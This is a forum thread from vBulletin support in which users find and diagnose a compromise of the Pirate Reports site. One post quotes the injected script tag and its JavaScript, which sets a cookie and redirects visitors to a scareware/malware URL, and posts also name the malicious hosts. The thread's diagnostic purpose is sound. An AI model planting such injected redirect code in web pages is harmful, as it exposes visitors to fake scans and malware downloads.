Announcement

Collapse
No announcement yet.

Pirate Reports?

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Pirate Reports?

    Are you guys aware that Pirate Reports is an attack site?

  • #2
    Eh?

    Pirate Reports is the company vB use to pursue illegal users of vBulletin.
    MARK.B | vBULLETIN SUPPORT

    TalkNewsUK - My vBulletin 5.5.2 Demo
    AdminAmmo - My Cloud Demo

    Comment


    • #3
      Ya, i know... but every time i go to their page it brings up one of those "Press here to scan your system! its infected!" messages and trys to auto-download something... my computer is clean of any spyware. i do a daily check.

      Comment


      • #4
        Originally posted by Randall Marquis View Post
        Ya, i know... but every time i go to their page it brings up one of those "Press here to scan your system! its infected!" messages and trys to auto-download something... my computer is clean of any spyware. i do a daily check.
        Hmm, you're not wrong.

        Javascript popup comes up. Not good.
        MARK.B | vBULLETIN SUPPORT

        TalkNewsUK - My vBulletin 5.5.2 Demo
        AdminAmmo - My Cloud Demo

        Comment


        • #5
          Originally posted by Mark.B View Post
          Hmm, you're not wrong.

          Javascript popup comes up. Not good.
          Indeed. I think the vb team should be notified of this.

          Comment


          • #6
            It's been hacked (at least I hope not the owners stupid joke).

            There's a line in the bottom which calls http://indesignstudioinfo.com/ls.php ...it saves a cookie than redirects to this malware site:
            http://www4.suitcase52td.net/?p=p52dcWpkbmqHnc3KbmNToKV1iqHWnG2dXpeYlWhtZZycmA%3D%3D

            Definitely a reputation killer.

            Comment


            • #7
              The problem is tht PR has this before close body tag.
              HTML Code:
              <script src="http://indesignstudioinfo.com/ls.php"></script>
              It is Javascript file:
              Code:
              function setCookie(c_name,value,expiredays){
              	var exdate=new Date();
              	exdate.setDate(exdate.getDate()+expiredays);
              	document.cookie=c_name+ "=" +escape(value)+
              	((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
              }
              
              
              function getCookie(c_name){
              if (document.cookie.length>0)
                {
                c_start=document.cookie.indexOf(c_name + "=");
                if (c_start!=-1)
                  {
                  c_start=c_start + c_name.length+1;
                  c_end=document.cookie.indexOf(";",c_start);
                  if (c_end==-1) c_end=document.cookie.length;
                  return unescape(document.cookie.substring(c_start,c_end));
                  }
                }
              return "";
              }
              
              
              var name=getCookie("pma_visited_theme1");
              if (name==""){
              	setCookie("pma_visited_theme1","1",20);
              	var url="http://www4.suitcase52td.net/?p=p52dcWpkbmqHnc3KbmNToKV1iqHWnG2dXpeYlWhtZZycmA%3D%3D";
              	window.top.location.replace(url);
              }else{
              
              
              }
              It is a cookie stealer which redirect to another site that tryes to install an activex controller (probably a virus or trojan backdoor).
              Adrian Sacchi - Forums Mods / vBulletin Alpha/Beta Tester & Bug Scrubber

              Comment


              • #8
                I've pointed it out to Howard, we're looking into it.

                Comment


                • #9
                  LULZ. Pirate Reports got pirated. Epic.
                  [PIC]http://pic.mk/images/yayay.png[/PIC]


















                  It's not like they we're doing something but hey...
                  Attached Files

                  Comment


                  • #10
                    Actually Godaddy was hacked not us specifically and the site will be back shortly.

                    Comment


                    • #11
                      Glad i let you guys know. Doesnt help vbulletin reputation that something they use is a malicious site. ^_^

                      Comment


                      • #12
                        Indeed. Good catch. Hopefully they will fix it soon.

                        Comment


                        • #13
                          Originally posted by Randall Marquis View Post
                          Glad i let you guys know. Doesnt help vbulletin reputation that something they use is a malicious site. ^_^
                          Well actually Pirate Reports is not owned by Internet Brands or Jelsoft, is not an attack site, is not insecure and can't be held responsible for a network dropping the ball on its security.

                          Fortunately Floris has my contact details and those of my network guy and we just uploaded a backup instead resolving the issue.

                          I think a simple query or even a support ticket might have been a more sensative approach given the circumstance and there is no infection from this sales script it is just scare tactics.

                          Comment


                          • #14
                            So was Pirate Reports hacked or did you place the sales script there intentionally?
                            If you read it online, it must be true.

                            Comment


                            • #15
                              Originally posted by JamesAB View Post
                              So was Pirate Reports hacked or did you place the sales script there intentionally?
                              Some Godaddy servers were hacked en masse and we appear to have been caught up in the group.

                              Of course we didn't put the script there I think that is obvious we want people to read our site not have a bogus virus scan to scare them into buying software.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X